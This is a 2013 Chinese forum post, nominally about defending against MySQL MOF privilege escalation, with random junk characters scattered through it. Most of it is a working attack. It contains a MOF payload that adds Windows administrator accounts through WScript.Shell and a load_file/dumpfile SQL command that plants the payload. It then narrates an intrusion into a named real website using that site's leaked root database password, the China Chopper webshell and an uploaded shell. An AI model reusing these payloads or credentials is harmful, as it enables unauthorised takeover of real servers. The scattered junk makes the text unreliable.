Mysql mof扩展漏洞防范方法 n, y6 |5 i( u5 f
" s" u! D9 K2 s3 }" i7 W网上公开的一些利用代码:& H( X% D/ H( C6 M: N+ d" F
4 b; c u, `: X4 Q" @#pragma namespace(“\\\\.\\root\\subscription”)( \+ x( r# `5 L0 S
; g1 t1 _) y: v9 P3 b% y6 W! ^+ l/ f) ?instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };9 }2 b& @5 I2 G t; q
5 ^# Z! ?" c1 z2 ~$ v; A7 O + I; x" M" M3 w/ H
& T* ^! _4 [3 l2 }
; P9 B3 F5 B- m1 E+ x! f
5 Z, g) i0 n- t1 ?连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
0 \8 U/ O" S& f" T/ r! E从上面代码来看得出解决办法:
7 L9 B& J; |$ K; y' `% H5 ^/ z) s
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数& Y- w$ a* ^6 D* Z6 |/ j3 B
[" F# M9 k7 Y9 I5 f2、禁止使用”WScript.Shel”组件2 [5 ~; m9 S* G, x6 k
: D0 L n+ U4 F4 X8 ~
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
2 d2 P. j& U/ l8 h! f
6 R& e4 g- k; d" [+ R3 _( k当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下1 Y! p! {' ^" y3 a: [
% G- ?3 E+ ^: T- X; ?6 f) S. D! M! H事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权# u, S# g% G' `$ \2 h7 {3 n
2 V" Q4 `+ m2 Z$ t6 C
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
. }+ D! L: C1 X; H. G1 t& z" ~7 ~( y4 F* y0 G
看懂了后就开始练手吧/ X. Q% }3 B+ Q, c
( W' \. f8 o' h2 f3 rhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
& ^! g! F' F: T; x# e7 j2 p% }
; h: E! I$ P* N$ ]. E/ y- R$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
% n, ]6 O7 A- n; K. u6 J2 C" `0 x; F- B
于是直接用菜刀开搞
5 R4 }; W4 l/ x4 y& J
3 Q6 n: F. ?; m) p8 g: u# P5 T3 X上马先5 V# H {) [# ]$ F2 n
8 g/ `4 B/ i9 R
既然有了那些账号 之类的 于是我们就执行吧…….
/ r" b3 n8 g( _5 i0 p, P7 M( D& Z. W L+ O4 O$ r5 m" a+ ?- G: X' _
小小的说下
! q$ G9 w) z, D6 X
2 h# x9 w2 K- |9 e; F在这里第1次执行未成功 原因未知
2 S5 c# l. _* |) a1 L, L+ B' z, g; G# h k( e
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
: ^0 W9 Q. [& I+ J8 [5 o# D+ R9 M \& m! F+ F& V$ K
#pragma namespace(“\\\\.\\root\\subscription”)
: g2 G) B' A! Q( [! j* L3 x: E1 j+ w0 W8 q3 d
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };6 B- B# |/ U. g
# F4 d5 M# d3 K' t c
我是将文件放到C:\WINDOWS\temp\1.mof
& B0 G4 l1 |1 [' H! f+ _( v
8 h0 m! }/ z% \所以我们就改下执行的代码: g+ r8 ~3 C- o9 E: c- q
2 K' n8 w2 i7 `: Z: n0 D/ L0 g' U& _select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
7 y+ f5 W! E0 t6 }+ [- \
- Y* y7 v5 i4 _4 A
1 o U7 l+ t7 P& }; p" }& [) K% D6 s/ x8 A4 }& p
但是 你会发现账号还是没有躺在那里。。
# H5 `* `: Y. q* K1 t6 q7 f% l1 s; o# p' A( p
于是我就感觉蛋疼' w' h' f& G7 N
5 w: ]) | S' f b w
就去一个一个去执行 但是执行到第2个 mysql时就成功了………7 \& Q w# m/ }* l i
' v* @/ ~6 ?# p+ P' g
* r! F$ p( B6 P- @) R, X
2 I6 T# M8 c: {4 k {: H% |但是其他库均不成功…
' x# `* A( I M1 Z5 Q: S
T4 }6 C/ c8 d4 R2 p我就很费解呀 到底为什么不成功求大牛解答…) N* `# I2 c/ m' W9 j3 K
3 |' e4 n* E" b; X
8 ]" B$ N- B* h% g- |% j8 V* i
/ |; E4 c+ e* ^; V* d( K; k
|
发表于 2013-1-4 19:49:49
收藏
支持
反对